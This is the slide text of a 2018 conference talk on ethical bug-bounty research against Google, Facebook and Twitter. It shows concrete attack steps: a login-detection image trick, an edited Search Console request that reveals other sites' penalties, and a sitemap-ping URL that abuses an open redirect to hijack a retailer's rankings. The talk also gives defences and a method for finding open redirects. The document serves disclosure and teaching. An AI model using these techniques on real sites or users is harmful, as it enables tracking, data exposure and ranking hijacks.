Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SearchLove Boston 2018 - Tom Anthony - Hacking Google: what you can learn from ethical vulnerability research

1,291 views

Published on

Tom has long been fascinated with how the web works… and how he could break it. In this presentation, Tom will discuss some of the times that he has discovered security issues in Google, Facebook and Twitter. He will discuss compromising Search Console so that he could look up any penalty in the Manual Action tool, how he took control of tens of thousands of websites, and how he recently discovered a major bug that let him rank brand new sites on the first page with no links at all. Tom will outline how these exploits work, and in doing so share some details about the technical side of the web.

  • Be the first to comment

SearchLove Boston 2018 - Tom Anthony - Hacking Google: what you can learn from ethical vulnerability research

  1. 1. HACKING GOOGLE Learning from Ethical Vulnerability Research @TomAnthonySEO
  2. 2. 20 years ago…
  3. 3. I’d hacked into a corporate network…
  4. 4. 287 Years
  5. 5. Bug Bounty programs didn’t exist yet…
  6. 6. Turns out, SEO required same mindset…
  7. 7. Social Network Login Status Googlebot Experiments Google Manual Actions XML Sitemaps Manipulation
  8. 8. Turns out you can combine SEO + Vulnerability Research… • 1st page of results • 6 days old domain • 0 links
  9. 9. Allowing for SEO results like this, one day to the next…
  10. 10. Social Network Login Status
  11. 11. DETECT WHICH SOCIAL NETWORKS PEOPLE ARE LOGGED INTO http://www.tomanthony.co.uk/tools/detect-social-network-logins/
  12. 12. facebook.com/tomsprofile
  13. 13. facebook.com/tomsprofile facebook.com/login?continue=/tomsprofile 302 redirect to: Page served (200): facebook.com/tomsprofile
  14. 14. facebook.com/login?continue=/tomsprofile facebook.com/tomsprofile facebook.com/login?continue=/tomsprofile Page served (200): 302 redirect to:
  15. 15. facebook.com/login?continue=/tomsprofile facebook.com/tomsprofile facebook.com/login?continue=/tomsprofile Page served (200): 302 redirect to: Already logged in, so just redirect to the intended page.
  16. 16. facebook.com/login?continue=/logo.png facebook.com/logo.png facebook.com/login?continue=/logo.png Page served (200): 302 redirect to:
  17. 17. facebook.com/login?continue=/logo.png facebook.com/logo.png facebook.com/login?continue=/logo.png Page served (200): 302 redirect to: Already logged in, so redirect and serve the image.
  18. 18. facebook.com/login?continue=/logo.png Image Webpage
  19. 19. onerror="alert('anonymous')" onsuccess="alert('loggedin')" /> <img src=“facebook.com/login?continue=/logo.png” onerroronsuccess alert('anonymous')alert('loggedin')
  20. 20. OTHERS HAVE EXTENDED IT https://robinlinus.github.io/socialmedia-leak/
  21. 21. PUMP IT INTO GA
  22. 22. CUSTOMISE SOCIAL BUTTONS
  23. 23. LOGGED IN TO A COMPETITOR?
  24. 24. Social Network preferences
 can be recorded*/used. TAKEAWAY * something something GDPR
  25. 25. Redirects can be abused to get unexpected behaviours OBSERVATION
  26. 26. Googlebot Experiments
  27. 27. GOOGLEBOT & COOKIES
  28. 28. GOOGLEBOT & COOKIES
  29. 29. GOOGLEBOT JAVASCRIPT - RANDOM IS NOT RANDOM! Math.random() = 0.19426893815398216
  30. 30. SCRIPTS THAT SHOULD BE RANDOM CAN DETECT GOOGLEBOT
  31. 31. GOOGLEBOT JAVASCRIPT - SECONDS ARE NOT SECONDS setTimeout(doSomething, 5000) Browsers will wait 5000 milliseconds (5 seconds). GoogleBot fast forwards (dates become wrong).
  32. 32. GoogleBot does accept cookies in certain scenarios. TAKEAWAY
  33. 33. GoogleBot uses heavily optimised Javascript. TAKEAWAY
  34. 34. There are undocumented
 functionalities in GoogleBot OBSERVATION
  35. 35. Google Manual Actions
  36. 36. The Snag
  37. 37. MANUAL ACTIONS TOOL
  38. 38. API ENDPOINT https://www.google.com/webmasters/tools/gwt/MANUAL_ACTION_PUBLIC? hl=en&siteUrl=http://www.tomanthony.co.uk/
  39. 39. POST DATA 7|0|13|https://www.google.com/webmasters/tools/gwt/| DE16AEA7C924CC47F26F7ADC4C584289| com.google.crawl.wmconsole.fe.feature.gwt.manualaction.shared. ManualActionService|getManualActions| com.google.crawl.wmconsole.fe.feature.gwt.base.shared.FeatureC ontext/1637625730|java.lang.String/2004016611|/webmasters/ tools|java.lang.Boolean/476441737| com.google.crawl.wmconsole.fe.feature.gwt.config.FeatureKey/ 4151209095|0|en|http://www.tomanthony.co.uk/| com.google.crawl.wmconsole.fe.base.PermissionLevel/2603202488| 1|2|3|4|2|5|6|5|7|8|0|0|9|5|10|11|12|12|13|5|12|
  40. 40. RESPONSE (NO PENALTY)
  41. 41. ELITE HACKING SKILLZ 7|0|13|https://www.google.com/webmasters/tools/gwt/| DE16AEA7C924CC47F26F7ADC4C584289| com.google.crawl.wmconsole.fe.feature.gwt.manualaction.shared. ManualActionService|getManualActions| com.google.crawl.wmconsole.fe.feature.gwt.base.shared.FeatureC ontext/1637625730|java.lang.String/2004016611|/webmasters/ tools|java.lang.Boolean/476441737| com.google.crawl.wmconsole.fe.feature.gwt.config.FeatureKey/ 4151209095|0|en|http://www.apple.com/| com.google.crawl.wmconsole.fe.base.PermissionLevel/2603202488| 1|2|3|4|2|5|6|5|7|8|0|0|9|5|10|11|12|12|13|5|12|
  42. 42. GOOGLE HAPPY TO SHARE
  43. 43. POSSIBLE TO SIMPLE CRAWL LIST OF MANUAL ACTIONS
  44. 44. SOME SITES HAD MORE PROBLEMS THAN OTHERS…
  45. 45. At this point, I’d confirmed there was a definite security issue, and reported it to Google.
  46. 46. OMINOUS MATT CUTTS EMAILS… :D * Matt was actually great
  47. 47. GOOGLE RESPONSE ✓ Acknowledged report in only 11 minutes! ✓ Triaged in a couple of hours. ✓ Fixed and back online in 4 days. ✓ $5000 bounty.
  48. 48. A lot more sites have manual
 penalties than you may think! TAKEAWAY
  49. 49. Google Search Console
 also has security gaps OBSERVATION
  50. 50. So far not shown any direct manipulation of rankings…
  51. 51. Disclaimer: Distilled don’t condone blackhat. Blackhat is naughty & bad.
  52. 52. XML Sitemaps Manipulation
  53. 53. Redirects can be abused to get unexpected behaviours OBSERVATION
  54. 54. There are undocumented
 functionalities in GoogleBot OBSERVATION
  55. 55. Google Search Console
 also has security gaps OBSERVATION
  56. 56. Can we put all that together?
  57. 57. SUBMITTING AN XML SITEMAP ✓ Search Console ✓ robots.txt
  58. 58. SUBMITTING AN XML SITEMAP
  59. 59. SUBMITTING AN XML SITEMAP Not entirely true…
  60. 60. CAN SUBMIT NEW SITEMAP FILES VIA THE PING URL ✓ Typically crawled within seconds ✓ No auth - ping sitemaps for any domain ✓ Google follows redirects
  61. 61. CAN SUBMIT NEW SITEMAP FILES VIA THE PING URL ✓ Typically crawled within seconds ✓ No auth - ping sitemaps for any domain ✓ Google follows redirects Interesting…
  62. 62. GOOGLE’S CHECKLIST FOR A VALID XML SITEMAP ✓ Sitemap must be correctly formatted ✓ The URLs must exist ✓ Site containing the URLs must be in GSC ✓ Site hosting the sitemap must be in GSC
  63. 63. GOOGLE’S CHECKLIST FOR A VALID XML SITEMAP ✓ Sitemap must be correctly formatted ✓ The URLs must exist ✓ Site containing the URLs must be in GSC ✓ Site hosting the sitemap must be in GSC Interesting…
  64. 64. GOOGLE’S CHECKLIST FOR A VALID XML SITEMAP ✓ Site hosting the sitemap must be in GSC
  65. 65. OBSERVATIONS ✓ Google follows redirects ✓ Site hosting sitemap must be in GSC
  66. 66. OBSERVATIONS ✓ Google follows redirects ✓ Site hosting sitemap must be in GSC ✓ Will Google follow a x-domain sitemap redirect? ✓ Will they ‘trust' it? QUESTIONS
  67. 67. Will Google follow a cross domain
 redirect for a sitemap? QUESTION ?
  68. 68. SIMPLE TEST 1. Hosted a sitemap.xml on blue.com 2. Setup a redirect script on green.com 3. Ping green.com?next=blue.com/sitemap.xml https://www.google.com/webmasters/sitemaps/ping? sitemap=http://green.com/next/blue.com/sitemap.xml
  69. 69. Will Google follow a cross domain
 redirect for a sitemap? YES
  70. 70. Will they ‘trust' it? (if submitted via ping url) QUESTION ?
  71. 71. Will they ‘trust' it? Let’s assume…
  72. 72. How could we
 EXPLOIT
 it? QUESTION ?
  73. 73. JONO IS OUR INNOCENT VICTIM jono.com
  74. 74. REDIRECT URLS STRIKE BACK! jono.com/logout?continue=/page.html
  75. 75. VICTIM & ATTACKER jono.com tom.com
  76. 76. OPEN REDIRECTS (CROSS DOMAIN) jono.com/logout?continue=tom.com/page.html
  77. 77. WHAT HAPPENS IF WE DO THIS? jono.com/logout?continue=tom.com/evil.xml
  78. 78. WHAT HAPPENS IF WE DO THIS? jono.com/logout?continue=tom.com/evil.xml URL on jono.com, but serves XML Sitemap from tom.com.
  79. 79. WHAT HAPPENS IF WE DO THIS??? https://www.google.com/webmasters/sitemaps/ping? sitemap=http://jono.com/logout?continue=tom.com/evil.xml
  80. 80. WHAT HAPPENS IF WE DO THIS??? https://www.google.com/webmasters/sitemaps/ping? sitemap=http://jono.com/logout?continue=tom.com/evil.xml Ping the URL to submit the sitemap.
 Will Google think the evil sitemap belongs to jono.com?
  81. 81. PINGING SITEMAPS CROSS-DOMAIN ✓ Google follows the redirect, and crawls it. ✓ Google trusts it as canonical to the originating domain. https://www.google.com/webmasters/sitemaps/ping? sitemap=http://jono.com/logout?continue=tom.com/evil.xml
  82. 82. WE CAN NOW SUBMIT TRUSTED
 SITEMAPS FOR OTHER SITES
  83. 83. We can now submit hreflang entries for other sites…
  84. 84. Lets try it in the wild…
  85. 85. DISCLAIMER 
 I’m showing real results, but an alternative (similarly sized) UK retailer in the screenshots.
  86. 86. EXPERIMENT: HIJACK TESCO.COM INTERNATIONAL EQUITY
  87. 87. UK PRESENCE, BUT NO US PRESENCE
  88. 88. HIJACK UK EQUITY TO RANK IN US
  89. 89. HIJACK UK EQUITY TO RANK IN US
  90. 90. STEP 1: FIND A REDIRECT
  91. 91. STEP 1: FIND A REDIRECT
  92. 92. STEP 2: REGISTER A DOMAIN ($12) TESCOGLOBAL.COM
  93. 93. STEP 3: SETUP A NEW SITE ✓ Scrape contents for products/categories ✓ Mirror the URL structure
  94. 94. STEP 4: CREATE AN EVIL SITEMAP
  95. 95. STEP 5: PING OUR EVIL SITEMAP (HOSTED ON OUR FAKE SITE) https://www.google.com/webmasters/sitemaps/ping? sitemap=http://www.tesco.com/logout? continue=http://tescoglobal.com/sitemap_global.xml
  96. 96. RESULTS: CRAWL ACTIVITY APPEARS IN SEARCH CONSOLE
  97. 97. RESULTS: SEARCH VISIBILITY GROWS RAPIDLY
  98. 98. RESULTS: TRAFFIC APPEARING IN GA
  99. 99. RESULTS: BRITISH TERMS RANKING 1ST FOR MANY QUERIES
  100. 100. Still only submitted a sitemap, nothing else.
  101. 101. RESULTS: TRAFFIC KEEPS ON INCREASING…
  102. 102. RESULTS: SEARCH VISIBILITY GROWS MORE
  103. 103. RESULTS: I HIT FIRST PAGE FOR COMPETITIVE MONEY TERMS… • 1st page of results • 6 days old domain • 0 links
  104. 104. RESULTS: MILLIONS OF SEARCH IMPRESSIONS
  105. 105. ‘LINKS’ APPEAR IN GSC — SHOWING GOOGLE TRUSTS THE SITEMAP
  106. 106. EARLIER: CAN’T SUBMIT SITEMAPS IN GSC WHEN NOT PERMITTED SITEMAP NOT PERMITTED EXAMPLE:
  107. 107. NOW: CROSS SUBMITTED THE SITEMAP TO MY GSC, AND IT WAS ALLOWED SITEMAP NOT PERMITTED EXAMPLE: SITEMAP FOR "TESCO.COM" URLS WAS ALLOWED IN “TESCOGLOBAL.COM" GSC:
  108. 108. EVEN TRACKS INDEXATION… SITEMAP NOT PERMITTED EXAMPLE: SITEMAP FOR "TESCO.COM" URLS WAS ALLOWED IN “TESCOGLOBAL.COM" GSC:
  109. 109. SUMMARY ✓ Budget: $12 ✓ Setup time: ~4 hours ✓ Other activity: nothing ✓ Links: 0 ✓ Impressions: > 1.5 million ✓ Clicks: > 12,000
  110. 110. ALMOST UNDETECTABLE
  111. 111. DEFENCE ✓ No open redirects ✓ If you have them - block in robots.txt ✓ Have a sitemap, with hreflang & media entries ✓ Hide your sitemaps ✓ Check 302s in logs
  112. 112. FINDING OPEN REDIRECTS ✓ Look for redirect parameter (e.g continue= or next=) ✓ Check login & logout URLs ✓ Site searches, e.g site:www.foo.com inurl:=http ✓ Better with specific sections: site:www.foo.com/bar inurl:=http ✓ Check not blocked in robots.txt ✓ Check openbugbounty.org
  113. 113. GOOGLE OFFICIAL RESPONSE ✓ I reported it in September 2017 ✓ March 2018 - Google award a bug bounty ✓ March 2018 - Google confirm it is fixed. ✓ April 2018 - Google increase the bug bounty ($5000)
  114. 114. hreflang entries are ignored
 if your sitemaps are unverified TAKEAWAY
  115. 115. Ensure you do not have
 open redirects on your site! TAKEAWAY (robots.txt block them if you can’t remove them)
  116. 116. Not seen this attack in wild.
 Check your logs for 302s. TAKEAWAY
  117. 117. Be aware, there are these types 
 of potential attacks out there TAKEAWAY (but don’t blame everything on them!)
  118. 118. Bring back the
 Hacker Mindset TAKEAWAY
  119. 119. Thank you! @TomAnthonySEO

×